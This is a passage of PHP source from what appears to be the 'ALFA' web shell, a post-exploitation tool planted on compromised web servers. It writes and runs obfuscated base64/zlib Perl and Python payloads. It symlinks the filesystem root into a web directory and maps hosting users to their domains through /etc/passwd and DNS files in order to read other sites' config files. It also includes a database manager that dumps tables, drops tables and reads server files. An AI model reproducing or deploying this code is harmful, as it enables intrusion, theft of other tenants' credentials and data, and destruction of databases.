5258 $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';
5259 $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
5260 $cginame = "symperl.alfa";
5261 $source = $perl;
5262 $lang = "perl";
5263 if($_POST["alfa2"]=="sympy"){
5264 $cginame = "pysymlink.alfa";
5265 $source = $py;
5266 $lang = "python";
5267 }
5268 @__write_file($cginame,$source);
5269 @chmod($cginame,0755);
5270 echo __pre();
5271 $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
5272 if(strlen($resource) == 0){
5273 echo AlfaiFrameCreator('cgialfa/'.$cginame);
5274 }else{
5275 echo $resource;
5276 }
5277}
5278if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
5279if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
5280AlfaNum(9,10);
5281echo __pre().'
5282<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
5283<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
5284<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
5285<p><input type="submit" value=" " name="symlink" /></p></form></center>';
5286$path = $_POST['alfa5'];
5287$symname = $_POST['alfa6'];
5288$solevisible58 = $_POST['alfa7'];
5289if($solevisible58){
5290$new_name = str_replace(".", "_", basename($symname));
5291$rand_dir = $new_name.rand(111,9999);
5292$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
5293@mkdir($sym_dir, 0777, true);
5294alfacgihtaccess('sym', $sym_dir, $symname);
5295_alfa_symlink("$path","$sym_dir/$symname");
5296echo __pre();
5297echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
5298}
5299}else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
5300}
5301if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
5302$cant_symlink = true;
5303if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
5304@mkdir('alfasymlink',0777);
5305alfacgihtaccess('sym','alfasymlink/');
5306_alfa_symlink('/','alfasymlink/root');
5307$table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
5308if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
5309echo "<center>";
5310$lines = array();
5311$anony_domains = array();
5312$anonymous_users = array();
5313$f_black = array();
5314$error = false;
5315$anonymous = false;
5316$makepwd = "/home/{user}/public_html/";
5317$domains = alfaGetDomains();
5318$lines = $domains["lines"];
5319$state = $domains["state"];
5320$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
5321$can_runcmd = _alfa_can_runCommand(false,false);
5322if(!$is_posix && !$can_runcmd){
5323 $anonymous = true;
5324 $anony_domains = $domains["lines"];
5325 $lines = _alfa_file('/etc/passwd');
5326}
5327echo $table_header;
5328$count=1;
5329$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
5330foreach($lines as $line){
5331 $domain = "";
5332 $owner = "";
5333 if($anonymous){
5334 $explode = explode(":", $line);
5335 $owner = $explode[0];
5336 $owner_len = strlen($owner) - 1;
5337 $userid = $explode[2];
5338 if((int)$userid < 500)continue;
5339 $domain = "[?????]";
5340 $temp_black = array();
5341 $finded = false;
5342 foreach($anony_domains as $anony){
5343 if($state == "named.conf"){
5344 if(@strstr($anony, 'zone')){
5345 preg_match_all('#zone "(.*)"#',$anony, $data);
5346 $domain = $data[1][0];
5347 }else{
5348 continue;
5349 }
5350 }elseif($state == "named" || $state == "valiases"){
5351 if($anony == "." || $anony == "..")continue;
5352 if($state == "named")$anony = rtrim($anony, ".db");
5353 $domain = $anony;
5354 }
5355 $sub_domain = str_replace(array("-","."), "", $domain);
5356 if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
5357 if(in_array($owner.$domain, $temp_black))continue;
5358 $sympath = str_replace("{user}", $owner, $makepwd);
5359 $http = "http://".$domain;
5360 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
5361 $count++;
5362 $temp_black[] = $owner.$domain;
5363 $finded = true;
5364 }
5365 }
5366 if(!$finded){
5367 $anonymous_users[] = $owner;
5368 }
5369 }else{
5370 if($state == "named.conf"){
5371 if(@strstr($line, 'zone')){
5372 preg_match_all('#zone "(.*)"#',$line, $data);
5373 $domain = $data[1][0];
5374 }else{
5375 continue;
5376 }
5377 }elseif($state == "named" || $state == "valiases"){
5378 if($line == "." || $line == "..")continue;
5379 if($state == "named")$line = rtrim($line, ".db");
5380 $domain = $line;
5381 }
5382 if(strlen(trim($domain)) > 2 && $state != "passwd"){
5383 if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
5384 if($is_posix){
5385 $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
5386 $owner = $user["name"];
5387 }elseif($can_runcmd){
5388 $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
5389 }
5390 }
5391 }
5392 if(!$anonymous){
5393 if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
5394 $sympath = str_replace("{user}", $owner, $makepwd);
5395 $http = "http://".$domain;
5396 if($state == "passwd"){
5397 $http = "javascript:alert('we cant find domain...')";
5398 }
5399 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
5400 $count++;
5401 $f_black[] = $owner.$domain;
5402 }
5403}
5404if($anonymous){
5405 foreach($anonymous_users as $owner){
5406 $sympath = str_replace("{user}", $owner, $makepwd);
5407 $http = "javascript:alert('we cant find domain...')";
5408 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
5409 $count++;
5410 }
5411}
5412$cant_symlink = false;
5413}else{
5414$is_direct = false;
5415$makepwd = alfaMakePwd();
5416if(_alfa_file_exists("/etc/virtual/domainowners")){
5417 $makepwd = "/home/{user}/public_html";
5418 $is_direct = true;
5419}
5420$sole = _alfa_file("/etc/virtual/domainowners");
5421$count=1;
5422echo $table_header;
5423$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
5424if($sole){
5425 foreach($sole as $visible){
5426 if(@strstr($visible,":")){
5427 $solevisible = explode(':', $visible);
5428 $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
5429 echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
5430 }
5431 }
5432}else{
5433 $passwd = _alfa_file("/etc/passwd");
5434 if($passwd){
5435 $html = "";
5436 $is_named = false;
5437 $users = array();
5438 $domains = array();
5439 $uknowns = array();
5440 foreach($passwd as $user){
5441 $user = trim($user);
5442 $expl = explode(":", $user);
5443 if((int)$expl[2] < 500)continue;
5444 $users[$expl[0]] = $expl[5];
5445 }
5446 $site_domains = @scandir("/etc/virtual/");
5447 if(!$site_domains){
5448 $site_domains = alfaEx("ls /etc/virtual/");
5449 $site_domains = explode("\n", $site_domains);
5450 if(!$site_domains){
5451 $site_domains = _alfa_file("/etc/named.conf");
5452 if($site_domains){$is_named = true;}
5453 }
5454 }
5455 foreach($site_domains as $line){
5456 if($is_named){
5457 if(@strstr($line, 'zone')){
5458 preg_match_all('#zone "(.*)"#',$line, $data);
5459 $domain = $data[1][0];
5460 if(strlen($domain > 2) && !empty($domain)){
5461 $domains[] = $domain;
5462 }
5463 }
5464 }else{
5465 $domains[] = $line;
5466 }
5467 }
5468 $x = 1;
5469 foreach($users as $user => $home){
5470 foreach($domains as $domain){
5471 $user_len = strlen($user) - 1;
5472 $sub_domain = str_replace(array("-","."), "", $domain);
5473 $five_user = substr($user, 0,$user_len);
5474 $five_domain = substr($sub_domain, 0,$user_len);
5475 if($five_user == $five_domain){
5476 if($is_direct){
5477 $cwd = str_replace("{user}", $user, $makepwd);
5478 }else{
5479 $expl = explode("}/", $makepwd);
5480 $cwd = $home."/".$expl[1];
5481 }
5482 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
5483 }else{
5484 $uknowns[$user] = $home;
5485 }
5486 }
5487 }
5488 $uknowns = array_unique($uknowns);
5489 foreach($uknowns as $user => $home){
5490 if($is_direct){
5491 $cwd = str_replace("{user}", $user, $makepwd);
5492 }else{
5493 $expl = explode("}/", $makepwd);
5494 $cwd = $home."/".$expl[1];
5495 }
5496 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
5497 }
5498 echo($html);
5499 }
5500}
5501echo "</table>";
5502$cant_symlink = false;
5503}
5504}else{
5505 echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
5506 $cant_symlink = false;
5507}
5508if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
5509echo "</center></table>";
5510}
5511echo "</div>";
5512alfafooter();
5513}
5514function alfasql(){
5515class DbClass{
5516public $type;
5517public $link;
5518public $res;
5519public $mysqli_connect_error = false;
5520public $mysqli_connect_error_msg = "";
5521function __construct($type){
5522$this->type = $type;
5523}
5524function connect($host, $user, $pass, $dbname){
5525switch($this->type){
5526case 'mysql':
5527if($this->link = @mysqli_connect($host,$user,$pass,$dbname)){
5528 return true;
5529}else{
5530 $this->mysqli_connect_error = true;
5531 $this->mysqli_connect_error_msg = mysqli_connect_error();
5532 return false;
5533}
5534break;
5535case 'pgsql':
5536$host = explode(':', $host);
5537if(!$host[1]) $host[1]=5432;
5538if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
5539break;
5540}
5541return false;
5542}
5543function selectdb($db){
5544switch($this->type){
5545case 'mysql':
5546if(@mysqli_select_db($db))return true;
5547break;
5548}
5549return false;
5550}
5551function query($str){
5552switch($this->type){
5553case 'mysql':
5554return $this->res = @mysqli_query($this->link,$str);
5555break;
5556case 'pgsql':
5557return $this->res = @pg_query($this->link,$str);
5558break;
5559}
5560return false;
5561}
5562function fetch(){
5563$res = func_num_args()?func_get_arg(0):$this->res;
5564switch($this->type){
5565case 'mysql':
5566return @mysqli_fetch_assoc($res);
5567break;
5568case 'pgsql':
5569return @pg_fetch_assoc($res);
5570break;
5571}
5572return false;
5573}
5574function listDbs(){
5575switch($this->type){
5576case 'mysql':
5577return $this->query("SHOW databases");
5578break;
5579case 'pgsql':
5580return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
5581break;
5582}
5583return false;
5584}
5585function listTables(){
5586switch($this->type){
5587case 'mysql':
5588return $this->res = $this->query('SHOW TABLES');
5589break;
5590case 'pgsql':
5591return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
5592break;
5593}
5594return false;
5595}
5596function error(){
5597switch($this->type){
5598case 'mysql':
5599return @mysqli_error($this->link);
5600break;
5601case 'pgsql':
5602return @pg_last_error();
5603break;
5604}
5605return false;
5606}
5607function setCharset($str){
5608switch($this->type){
5609case 'mysql':
5610if(function_exists('mysql_set_charset'))
5611return @mysqli_set_charset($this->link,$str);
5612else
5613$this->query('SET CHARSET '.$str);
5614break;
5615case 'pgsql':
5616return @pg_set_client_encoding($this->link, $str);
5617break;
5618}
5619return false;
5620}
5621function loadFile($str){
5622switch($this->type){
5623case 'mysql':
5624return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
5625break;
5626case 'pgsql':
5627$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
5628$r=array();
5629while($i=$this->fetch())
5630$r[] = $i['file'];
5631$this->query('drop table solevisible');
5632return array('file'=>implode("\n",$r));
5633break;
5634}
5635return false;
5636}
5637function dump($table, $fp = false){
5638switch($this->type){
5639case 'mysql':
5640$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
5641$create = mysqli_fetch_array($res);
5642$sql = $create[1].";\n";
5643if($fp) fwrite($fp, $sql); else echo($sql);
5644$this->query('SELECT * FROM `'.$table.'`');
5645$head = true;
5646while($item = $this->fetch()){
5647$columns = array();
5648foreach($item as $k=>$v) {
5649if($v == null)
5650$item[$k] = "''";
5651elseif(is_numeric($v))
5652$item[$k] = $v;
5653else
5654$item[$k] = "'".@mysqli_real_escape_string($this->link, $v)."'";
5655$columns[] = "`".$k."`";
5656}
5657if($head) {
5658$sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
5659$head = false;
5660} else
5661$sql = "\n\t,(".implode(", ", $item).')';
5662if($fp) fwrite($fp, $sql); else echo($sql);
5663}
5664if(!$head)
5665if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
5666break;
5667case 'pgsql':
5668$this->query('SELECT * FROM '.$table);
5669while($item = $this->fetch()) {
5670$columns = array();
5671foreach($item as $k=>$v) {
5672$item[$k] = "'".addslashes($v)."'";
5673$columns[] = $k;
5674}
5675$sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
5676if($fp) fwrite($fp, $sql); else echo($sql);
5677}
5678break;
5679}
5680return false;
5681}
5682};
5683$db = new DbClass($_POST['type']);
5684if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){
5685$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
5686$db->selectdb($_POST['sql_base']);
5687switch($_POST['charset']){
5688case "Windows-1251": $db->setCharset('calfa1251'); break;
5689case "UTF-8": $db->setCharset('utf8'); break;
5690case "KOI8-R": $db->setCharset('koi8r'); break;
5691case "KOI8-U": $db->setCharset('koi8u'); break;
5692case "calfa866": $db->setCharset('calfa866'); break;
5693}
5694$json = json_decode($_POST['alfa2'],true);
5695if(count($json['tbl'])>0){
5696if($_POST['alfa1']=='dumpfile'){
5697if($fp = @fopen($json['file'],'w')){
5698foreach($json['tbl'] as $v)$db->dump($v, $fp);
5699fclose($fp);
5700$dumpStatus = true;
5701}}else{
5702foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
5703}
5704}
5705unset($_POST['alfa2']);
5706}
5707alfahead();
5708$form_visibility = "table";
5709if(isset($_POST['sql_host'])){
5710 $connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
5711 if($connection_db && !empty($_POST['sql_base'])){
5712 $form_visibility = "none";
5713 }
5714}
5715echo "
5716<div class='header' style='min-height:300px;'>".($form_visibility!="none"?"<center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>":"")."<div style='text-align:center;margin-bottom: 10px;'><button class='connection-his-btn db-opt-id' onclick='alfaShowConnectionHistory(this);' mode='on'>Connection History</button><div class='connection_history_holder'></div></div>
5717<form name='sf' class='db-opt-id' method='post' onsubmit='fs(this,null,this);return false;'><table style='margin: 0 auto;' cellpadding='2' cellspacing='0'><tr>
5718<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
5719<input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'UTF-8') ."'>
5720<td><select name='type'><option value='mysql' ";
5721if(@$_POST['type']=='mysql')echo 'selected';
5722echo ">MySql</option><option value='pgsql' ";
5723if(@$_POST['type']=='pgsql')echo 'selected';
5724echo ">PostgreSql</option></select></td>
5725<td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
5726<td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
5727<td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
5728$tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
5729if(isset($_POST['sql_host'])){
5730if($connection_db){
5731switch($_POST['charset']){
5732case "Windows-1251": $db->setCharset('calfa1251'); break;
5733case "UTF-8": $db->setCharset('utf8'); break;
5734case "KOI8-R": $db->setCharset('koi8r'); break;
5735case "KOI8-U": $db->setCharset('koi8u'); break;
5736case "calfa866": $db->setCharset('calfa866'); break;
5737}
5738$db->setCharset('utf8');
5739$db->listDbs();
5740echo "<select name=sql_base><option value=''></option>";
5741while($item = $db->fetch()) {
5742list($key, $value) = each($item);
5743echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
5744}
5745echo '</select>';
5746}else{
5747 echo $tmp;
5748}
5749}else
5750echo $tmp;
5751$curr_mysql_id = $_POST['current_mysql_id'];
5752echo "</td>
5753<td><input type='submit' value=' '></td>
5754<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
5755</tr>
5756</table>";
5757if($db->mysqli_connect_error){
5758 echo '<div style="text-align: center;font-size: 17px;margin-top: 18px;">'.$db->mysqli_connect_error_msg.'</div>';
5759}
5760if(!empty($curr_mysql_id)){
5761 $sql_title_db = "";
5762 if(!empty($_POST['sql_base'])){
5763 $sql_title_db = "d.querySelector('#tab_".$curr_mysql_id." span').innerHTML='".addslashes($_POST['sql_base'])."';";
5764 }
5765 echo "<script>mysql_cache['".$curr_mysql_id."']['host']='".addslashes($_POST['sql_host'])."';mysql_cache['".$curr_mysql_id."']['user']='".addslashes($_POST['sql_login'])."';mysql_cache['".$curr_mysql_id."']['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['".$curr_mysql_id."']['db']='".addslashes($_POST['sql_base'])."';mysql_cache['".$curr_mysql_id."']['charset']='".addslashes($_POST['charset'])."';mysql_cache['".$curr_mysql_id."']['type']='".addslashes($_POST['type'])."';mysql_cache['".$curr_mysql_id."']['count']='".addslashes($_POST['sql_count'])."';".$sql_title_db."alfaConnectionHistoryUpdate();</script>";
5766}
5767if(isset($db) && $db->link){
5768echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
5769if(!empty($_POST['sql_base'])){
5770$db->selectdb($_POST['sql_base']);
5771echo "<tr><td width=1 style='border-top:2px solid #666;vertical-align:top;'><div class='txtfont'>Tables:</div><br><br>";
